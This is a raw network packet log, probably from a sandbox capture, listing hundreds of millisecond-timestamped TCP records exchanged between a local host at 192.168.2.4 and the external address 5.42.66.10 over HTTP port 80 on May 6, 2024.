May 6, 2024 07:53:04.804714918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804722071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804733992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804740906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804744005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804754972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804759026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804766893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804779053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804785013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804790020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804801941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804805994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804812908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804819107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804826975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804837942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804840088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804851055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804862022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804862022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804872990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804872990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804884911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804894924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804897070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804913044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804936886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804948092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804960966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804986000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805008888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805114031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805125952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805135965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805147886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805150986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805159092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805162907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805171013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805181026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805182934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805195093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805197954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805207968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805218935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805221081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805229902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805234909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805241108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805253029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805259943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805264950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805274963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805285931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805288076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805295944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805296898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805310011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805311918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805320978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805331945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805332899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805345058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805356979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805357933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805370092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805381060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805381060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805393934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805399895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805404902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805418015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805421114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805421114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805429935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805440903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805453062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805458069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805478096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805490017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805600882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805614948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805627108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805638075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805639029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805649042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805651903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805660963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805670023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805672884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805685043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805692911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805696011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805706978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805711031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805718899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805728912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805735111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805741072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805752039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805758953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805763960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805775881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805778027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805787086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805788040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805799961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805811882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805815935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805823088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805834055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805840969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805846930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805856943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805857897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805869102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805871010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805881023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805907011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805912018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805918932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805924892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805936098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805948973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.805953979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805967093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.805994987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806061983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806072950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806083918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806094885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806097031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806106091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806107998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806118965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806128979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806130886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806143999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806145906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806155920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806168079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806171894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806188107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806210041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806217909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806230068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806240082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806252956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806255102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806263924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806276083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806277037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806287050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806288004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806299925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806309938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806310892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806322098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806328058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806334019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806344986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806355000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806369066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806375980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806382895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806387901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806399107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806410074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806411982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806421995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806430101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806435108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806438923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806447029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806457996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806468964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806471109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806483030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806493044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806493998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806504965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806515932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806518078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806526899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806529999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806540012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806550980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806556940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806562901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806575060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806581974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806586981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806593895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806597948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806611061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806613922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806622982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806633949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806636095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806646109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806664944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806670904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806670904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806677103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806688070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806695938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806699991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806703091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806734085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806870937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806884050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806893110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806905031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806910038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806917906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806930065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806932926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806941986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806952953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.806958914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806973934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.806993961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807003021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807013988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807027102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807034969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807038069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807048082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807049036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807060003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807065964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807071924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807082891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807085037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807096958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807106018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807109118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807118893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807121038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807147026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807162046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807169914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807174921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807185888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807198048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807199955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807209015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807213068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807220936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807231903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807231903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807245016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807256937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807256937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807266951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807270050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807295084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807297945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807311058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807322025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807322025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807333946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807343006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807344913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807357073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807368994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807385921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807406902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807439089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807450056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807461023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807472944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807475090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807486057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807487965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807498932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807504892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807511091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807522058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807523012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807534933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807544947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807545900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807557106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807558060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807584047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807589054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807604074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807607889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807614088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807626009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807631969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807636976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807646036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807647943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807658911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807670116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807677984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807682037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807686090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807693005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807703972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807708025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807714939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807727098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807732105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807739019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807749987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807759047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807761908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807770967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807790041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807811975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.807917118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.807954073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808087111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808103085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808116913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808120012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808128119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808137894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808141947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808147907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808150053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808162928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808171034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808173895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808186054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808192968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808197021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808208942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808212042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808222055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808232069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808234930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808243990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808254957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808259010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808265924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808273077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808279037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808289051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808296919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808301926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808315039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.808324099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.808326006 CEST	80	49741	5.42.66.10	192.168.2.4
